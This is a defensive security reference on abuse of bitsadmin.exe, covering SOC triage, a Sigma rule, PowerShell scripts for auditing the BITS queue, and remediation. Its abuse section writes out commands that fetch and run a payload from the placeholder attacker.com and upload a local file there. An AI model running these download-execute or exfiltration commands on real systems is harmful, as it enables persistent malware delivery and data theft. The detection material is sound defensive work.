bitsadmin.exe - BITS Admin LOLBin Security Analysis
Category: System utility
bitsadmin.exe is the command-line tool for the Background Intelligent Transfer Service (BITS) and a well-known LOLBin. Attackers abuse it to queue downloads that the BITS service performs in the background (the network activity comes from svchost.exe, not from bitsadmin.exe or the attacker's shell), to run a program when a job finishes via /SetNotifyCmdLine, and to upload data. Jobs live in the BITS queue, which survives reboots, so a queued download and its follow-on execution outlive the process that created them.
Risk Summary
CRITICAL priority for SOC triage. bitsadmin.exe is a top-tier LOLBin for persistent downloads and execution. Any /transfer, /addfile or /SetNotifyCmdLine command requires **immediate investigation**; /create and /resume are weaker on their own but almost always appear alongside them. Because the job, not the process, carries the payload, the work is not over when bitsadmin.exe exits: the queue persists across reboots and the BITS service finishes the job later.
Overview
What is bitsadmin.exe?
bitsadmin.exe creates, lists, modifies and cancels Windows Background Intelligent Transfer Service (BITS) jobs from the command line. It has been deprecated since Windows 7 / Server 2008 R2 in favour of the BitsTransfer PowerShell module (it prints a deprecation notice on every run), but it still ships with every supported Windows release.
Legitimate Functions
BITS Management:
- Download Windows updates
- Transfer large files
- Resume interrupted downloads
- Background throttled transfers
Why It's Dangerous
LOLBin Capabilities:
- Stealthy file downloads: the transfer is performed by the BITS service host (svchost.exe), not by the calling process
- Persistence across reboots: jobs stay in the BITS queue until completed, cancelled or expired
- Execute downloaded files: /SetNotifyCmdLine runs an arbitrary program when the job completes or errors
- Difficult to detect: no long-lived attacker process, and the download can finish long after bitsadmin.exe has exited
Security Significance
- Trusted Binary: Microsoft-signed, present on every Windows host, rarely blocked
- Persistence: Jobs survive restarts; by default a job that makes no progress is kept for 90 days before BITS removes it
- Evasion: Network traffic originates from svchost.exe with a Microsoft BITS user agent, so it blends in with Windows Update and other legitimate BITS traffic
- Execution: The notification command is launched by the BITS service, so the payload's parent is svchost.exe rather than the attacker's shell
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\bitsadmin.exe (C:\Windows\SysWOW64\bitsadmin.exe for 32-bit callers) |
| Parent | cmd.exe or powershell.exe in an elevated administrative session |
| User | Administrator; any user can create jobs for their own account, but /allusers and /reset /allusers need admin rights |
| Context | Administrator troubleshooting BITS or Windows Update, legacy deployment scripts |
Legitimate Usage
:: Check BITS jobs (legitimate, read-only)
bitsadmin /list /allusers
:: /allusers requires an elevated shell; without it only the current user's jobs are shown
Frequency
Direct bitsadmin.exe execution is rare. Windows components such as Windows Update use the BITS COM API from inside their own processes and never spawn bitsadmin.exe, and administrators are steered to the BitsTransfer PowerShell cmdlets (Get-BitsTransfer, Start-BitsTransfer). Any bitsadmin.exe process creation on a workstation therefore deserves a look.
Common Locations
C:\Windows\System32\bitsadmin.exe
C:\Windows\SysWOW64\bitsadmin.exe
Suspicious Indicators
Legitimate vs Suspicious
| | LEGITIMATE (very rare) | SUSPICIOUS (high confidence) |
|---|---|---|
| Command | bitsadmin /list; bitsadmin /info | bitsadmin /transfer ... /download http://...; bitsadmin /create followed by /addfile and /resume; bitsadmin /SetNotifyCmdLine |
| Context | System administration from an elevated shell | Any non-IT user; any account when the URL is external and the destination is a user-writable path |
| Frequency | Rare | Any single occurrence warrants triage |
Dangerous Parameters
| Parameter | Risk | Description |
|---|---|---|
| /transfer | CRITICAL | Create, start and complete a download or upload in one command |
| /addfile | CRITICAL | Add a remote URL / local path pair to an existing job |
| /SetNotifyCmdLine | CRITICAL | Program the BITS service runs when the job reaches TRANSFERRED or ERROR state |
| /upload | CRITICAL | Job type that sends a local file to a BITS-aware server (exfiltration) |
| /resume | HIGH | Activate the job so the service starts (or restarts) the transfer |
| /create | HIGH | Create a new, empty job |
| /complete | MEDIUM | Finalize a finished job; renames the BIT*.tmp partial file to its final name |
Abuse Techniques
Attack Techniques
Technique #1: File Download (T1197)
Download Malware via BITS:
:: /transfer creates, resumes and completes the job in one call and stays in the foreground until the transfer ends
bitsadmin /transfer job /download /priority high http://attacker.com/mal.exe C:\mal.exe
Persistent Download Job:
:: Multi-step form: the job stays in the queue between commands and across reboots
bitsadmin /create downloadjob
bitsadmin /addfile downloadjob http://attacker.com/payload.exe C:\payload.exe
bitsadmin /resume downloadjob
:: /complete only succeeds once the job state is TRANSFERRED; until then the data sits in a BIT*.tmp file in the destination directory
bitsadmin /complete downloadjob
Technique #2: Execute After Download (T1059)
:: Second argument is the program, third its parameters (NULL for none); the BITS service host (svchost.exe) launches it
:: when the job enters TRANSFERRED or ERROR state, so the payload's parent is svchost.exe, not cmd.exe or bitsadmin.exe
bitsadmin /SetNotifyCmdLine job C:\payload.exe NULL
bitsadmin /resume job
Technique #3: Persistence (T1197)
The BITS queue survives reboots: a job that has not finished is resumed by the service after restart, and the /SetNotifyCmdLine program fires whenever the job reaches TRANSFERRED or ERROR state, including after a reboot. By default an idle job is kept for 90 days before BITS removes it, and that lifetime can be extended, so an attacker can stage a long-lived job that delivers and launches a payload well after the initial foothold is gone, with no scheduled task, service or Run key to find.
Technique #4: Data Exfiltration (T1048)
:: Upload jobs need a BITS-aware server (the IIS BITS server extension or an attacker-controlled implementation)
bitsadmin /transfer exfil /upload http://attacker.com/upload C:\sensitive.zip
Detection Guidance
Detection Strategies
Priority #1: Any Download Command (CRITICAL)
Sigma Rule:
title: Bitsadmin Download
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\bitsadmin.exe'
        CommandLine|contains:
            - '/transfer'
            - '/addfile'
            - 'http'
    condition: selection
level: critical
Fields within a selection are ANDed and list values are ORed, so this fires for bitsadmin.exe with any of the three substrings in its command line; 'http' also catches /upload exfiltration and /addfile calls that use a URL without the keyword.
Priority #2: Execution Setup
Process = "bitsadmin.exe" AND
CommandLine CONTAINS "/SetNotifyCmdLine"
→ ALERT: CRITICAL - Execution on download completion
Follow-up: the program named in /SetNotifyCmdLine is started by the BITS service host, so correlate with process creations whose parent is svchost.exe around the time the job reaches TRANSFERRED or ERROR. The payload will not appear as a child of bitsadmin.exe or of the shell that ran it.
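The following is an added example, not code from the original page: it applies the Sigma selection above to process-creation records and adds the svchost.exe correlation described in the follow-up, flagging a program that was named in /SetNotifyCmdLine when it later appears as a child of svchost.exe. Record fields mirror Sysmon Event ID 1 / Security 4688 (Image, CommandLine, ParentImage, User, TimeCreated); the sample records, user names and scores are constructed for illustration, and attacker.com is the page's own placeholder.

```powershell
# Added example (not from the original page). Triage bitsadmin.exe telemetry plus the
# svchost.exe follow-up. Field names follow Sysmon Event ID 1 / Security 4688.

function Get-NotifyPrograms {
    # Program paths named in any /SetNotifyCmdLine command in the batch (quoted or bare).
    param([object[]] $Events)
    foreach ($e in $Events) {
        if ($e.CommandLine -match '/SetNotifyCmdLine\s+\S+\s+("([^"]+)"|(\S+))') {
            if ($Matches[2]) { $Matches[2] } else { $Matches[3] }
        }
    }
}

function Get-BitsTriage {
    param([object[]] $Events)
    $notifyProgs = @(Get-NotifyPrograms $Events)

    foreach ($e in $Events) {
        $cl      = [string]$e.CommandLine
        $reasons = [System.Collections.Generic.List[string]]::new()
        $score   = 0

        if ($e.Image -match '\\bitsadmin\.exe$') {
            # Sigma selection: Image AND any of the CommandLine substrings (scores are assumptions).
            if ($cl -match '/transfer')         { $score += 50; $reasons.Add('/transfer (one-shot download/upload)') }
            if ($cl -match '/addfile')          { $score += 40; $reasons.Add('/addfile (file added to persistent job)') }
            if ($cl -match '/SetNotifyCmdLine') { $score += 60; $reasons.Add('/SetNotifyCmdLine (program runs when job completes or errors)') }
            if ($cl -match '/upload')           { $score += 40; $reasons.Add('/upload (possible exfiltration)') }
            if ($cl -match '(https?|ftp)://[^\s"]+') { $score += 20; $reasons.Add("URL $($Matches[0])") }
            if ($cl -match '\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\|\\ProgramData\\|\\Windows\\Temp\\') {
                $score += 15; $reasons.Add('destination in user-writable path')
            }
            if ($score -eq 0 -and $cl -match '/(list|info|getstate|monitor)\b') { $reasons.Add('read-only query verb') }
        }
        elseif ($e.ParentImage -match '\\svchost\.exe$' -and
                ($notifyProgs | Where-Object { $_ -ieq $e.Image })) {
            # The BITS service host, not cmd.exe or bitsadmin.exe, launches the notification program.
            $score = 100; $reasons.Add('program named in /SetNotifyCmdLine spawned by svchost.exe')
        }

        $sev = if ($score -ge 60) {'CRITICAL'} elseif ($score -ge 40) {'HIGH'} elseif ($score -gt 0) {'MEDIUM'} else {'INFO'}
        [pscustomobject]@{
            Time     = $e.TimeCreated
            Severity = $sev
            Score    = $score
            User     = $e.User
            Image    = ($e.Image -split '\\')[-1]
            Parent   = ($e.ParentImage -split '\\')[-1]
            Reasons  = ($reasons -join '; ')
        }
    }
}

# Constructed sample telemetry (not real events): one benign query, one staged job, one payload launch.
$events = @(
    [pscustomobject]@{ TimeCreated='10:00:01'; User='CORP\helpdesk'; ParentImage='C:\Windows\System32\cmd.exe'
        Image='C:\Windows\System32\bitsadmin.exe'; CommandLine='bitsadmin /list /allusers /verbose' }
    [pscustomobject]@{ TimeCreated='10:02:10'; User='CORP\jdoe'; ParentImage='C:\Windows\System32\cmd.exe'
        Image='C:\Windows\System32\bitsadmin.exe'; CommandLine='bitsadmin /create job' }
    [pscustomobject]@{ TimeCreated='10:02:11'; User='CORP\jdoe'; ParentImage='C:\Windows\System32\cmd.exe'
        Image='C:\Windows\System32\bitsadmin.exe'; CommandLine='bitsadmin /addfile job http://attacker.com/payload.exe C:\Users\jdoe\AppData\Local\Temp\payload.exe' }
    [pscustomobject]@{ TimeCreated='10:02:12'; User='CORP\jdoe'; ParentImage='C:\Windows\System32\cmd.exe'
        Image='C:\Windows\System32\bitsadmin.exe'; CommandLine='bitsadmin /SetNotifyCmdLine job C:\Users\jdoe\AppData\Local\Temp\payload.exe NULL' }
    [pscustomobject]@{ TimeCreated='10:02:13'; User='CORP\jdoe'; ParentImage='C:\Windows\System32\cmd.exe'
        Image='C:\Windows\System32\bitsadmin.exe'; CommandLine='bitsadmin /resume job' }
    [pscustomobject]@{ TimeCreated='10:02:40'; User='CORP\jdoe'; ParentImage='C:\Windows\System32\svchost.exe'
        Image='C:\Users\jdoe\AppData\Local\Temp\payload.exe'; CommandLine='C:\Users\jdoe\AppData\Local\Temp\payload.exe' }
)

Get-BitsTriage $events | Sort-Object Score -Descending | Format-Table -AutoSize
```

Run against the constructed batch, the /SetNotifyCmdLine and /addfile events score CRITICAL/HIGH, the /list query stays INFO, and the payload.exe launch is rated CRITICAL purely because its parent is svchost.exe and its path matches an earlier notification command; without that correlation a child of svchost.exe is far too common to alert on by itself.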
Priority #3: List All Jobs
bitsadmin /list /allusers /verbose
# Run elevated. Review each job's owner, remote URLs, local paths and notification command line;
# a job stuck in TRANSFERRED state has finished downloading but has not been /complete'd yet
Priority #4: PowerShell Alternative
# Requires an elevated shell; -AllUsers includes jobs owned by other accounts.
# Note: a job whose JobState is Transferred has finished downloading but not been /complete'd,
# so review those separately rather than assuming the filter below covers everything.
Get-BitsTransfer -AllUsers | Where-Object {
    $_.TransferType -eq 'Download' -and
    $_.JobState -ne 'Transferred'
} | Format-List DisplayName, OwnerAccount, JobState, NotifyCmdLine, FileList
Remediation Steps
Protection and Remediation
Defense: Monitor BITS Jobs
# Scheduled task to audit BITS (run elevated); FileList is nested, so flatten it or the CSV only shows its type name
Get-BitsTransfer -AllUsers | Select-Object DisplayName, OwnerAccount, JobState, TransferType, NotifyCmdLine,
    @{n='RemoteNames'; e={ $_.FileList.RemoteName -join ';' }}, @{n='LocalNames'; e={ $_.FileList.LocalName -join ';' }} |
    Export-Csv "bits_audit.csv" -NoTypeInformation
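As an added example that is not part of the original page, the script below classifies jobs in the BITS queue the way the Priority #3/#4 checks and the audit above intend, flagging a set notification command, upload jobs, remote hosts outside an allowlist, user-writable destinations and executable payload names. The objects it consumes mirror the BitsJob properties returned by Get-BitsTransfer (DisplayName, OwnerAccount, JobState, TransferType, NotifyCmdLine, FileList with RemoteName/LocalName); the sample jobs and the trusted-host pattern are assumptions to be tuned per environment, and attacker.com is the page's placeholder.

```powershell
# Added example (not from the original page): classify BITS queue entries.
# On a live host run elevated:  Get-BitsTransfer -AllUsers | Test-BitsJob

# Assumption: hosts considered legitimate BITS sources in this environment; tune per site.
$TrustedHostPattern = '(\.|^)(windowsupdate\.com|microsoft\.com|windows\.com)$'

function Test-BitsJob {
    param([Parameter(Mandatory, ValueFromPipeline)] $Job)
    process {
        $flags = [System.Collections.Generic.List[string]]::new()

        # A notification command is the execution primitive; legitimate jobs almost never set one.
        if ($Job.NotifyCmdLine)              { $flags.Add("NotifyCmdLine set: $($Job.NotifyCmdLine)") }
        if ($Job.TransferType -eq 'Upload')  { $flags.Add('upload job (possible exfiltration)') }

        foreach ($f in @($Job.FileList)) {
            $uri = $null
            if ([Uri]::TryCreate([string]$f.RemoteName, [UriKind]::Absolute, [ref]$uri) -and
                $uri.Host -notmatch $TrustedHostPattern) {
                $flags.Add("untrusted remote host: $($uri.Host)")
            }
            if ($f.LocalName -match '\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\|\\ProgramData\\|\\Windows\\Temp\\') {
                $flags.Add("user-writable destination: $($f.LocalName)")
            }
            if ($f.LocalName -match '\.(exe|dll|ps1|bat|cmd|js|vbs|hta|scr)$') {
                $flags.Add('executable payload extension')
            }
        }

        $verdict = if ($flags.Count -ge 2) {'SUSPICIOUS'} elseif ($flags.Count -eq 1) {'REVIEW'} else {'ok'}
        [pscustomobject]@{
            Job     = $Job.DisplayName
            Owner   = $Job.OwnerAccount
            State   = $Job.JobState
            Type    = $Job.TransferType
            Verdict = $verdict
            Flags   = ($flags -join '; ')
        }
    }
}

# Constructed sample jobs shaped like Get-BitsTransfer output (not real queue contents).
$sampleJobs = @(
    [pscustomobject]@{ DisplayName='Windows Update'; OwnerAccount='NT AUTHORITY\SYSTEM'; JobState='Transferring'
        TransferType='Download'; NotifyCmdLine=$null
        FileList=@([pscustomobject]@{ RemoteName='http://download.windowsupdate.com/d/msdownload/update/x.cab'
                                       LocalName='C:\Windows\SoftwareDistribution\Download\x.cab' }) }
    [pscustomobject]@{ DisplayName='downloadjob'; OwnerAccount='CORP\jdoe'; JobState='Transferred'
        TransferType='Download'; NotifyCmdLine='C:\Users\jdoe\AppData\Local\Temp\payload.exe NULL'
        FileList=@([pscustomobject]@{ RemoteName='http://attacker.com/payload.exe'
                                       LocalName='C:\Users\jdoe\AppData\Local\Temp\payload.exe' }) }
)

$sampleJobs | Test-BitsJob | Format-Table -AutoSize

# Corroborate with the BITS client log (job created = 3, transfer started = 59, transfer stopped = 60;
# 59 and 60 carry the remote URL), which records jobs created via the API as well as via bitsadmin.exe:
# Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-Bits-Client/Operational'; Id=3,59,60 } |
#     Select-Object TimeCreated, Id, Message
```

The Windows Update sample comes back ok; the staged job is SUSPICIOUS on four counts. Keep the verdict thresholds conservative: a single untrusted host is worth a REVIEW, since software distribution tools legitimately use BITS against vendor CDNs, whereas any job with a notification command set should be treated as an incident until explained.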
Defense: Application Control
Use AppLocker or WDAC to block bitsadmin.exe for standard users; the tool is deprecated, so legitimate non-administrative use is effectively nil. This does not stop BITS abuse through the BitsTransfer PowerShell cmdlets or the COM API, so keep the job-monitoring controls above in place.
If Compromise Suspected
- List all BITS jobs (/list /allusers /verbose or Get-BitsTransfer -AllUsers) from an elevated shell
- Record each suspicious job's owner, URLs, local paths and notification command before touching it
- Cancel suspicious jobs
- Identify downloaded files, including BIT*.tmp partials in the destination directory
- Trace the execution chain: children of the BITS svchost.exe instance and of the shell that ran bitsadmin
- Remove persistence
:: Cancelling deletes the job and any partially downloaded BIT*.tmp file, so preserve evidence first
bitsadmin /cancel <job>
:: Removes every job in the queue for every user (requires admin); Windows Update and other
:: legitimate BITS users will simply create new jobs afterwards
bitsadmin /reset /allusers
Investigation Checklist
- List all BITS jobs with /list /allusers /verbose (or Get-BitsTransfer -AllUsers) from an elevated shell
- Review each job's remote URLs, local destinations and owner account
- Check for a notification command line (/SetNotifyCmdLine) on any job
- Identify downloaded files, including BIT*.tmp partials in the destination directory
- Check whether the downloads executed: children of the BITS svchost.exe instance and of the shell that ran bitsadmin
- Review command-line history (process-creation events for bitsadmin.exe) and Microsoft-Windows-Bits-Client/Operational events 3, 59 and 60
- Cancel malicious jobs once evidence is preserved
- Hunt for persistence: long-lived jobs, jobs owned by unexpected accounts, and jobs re-created after cancellation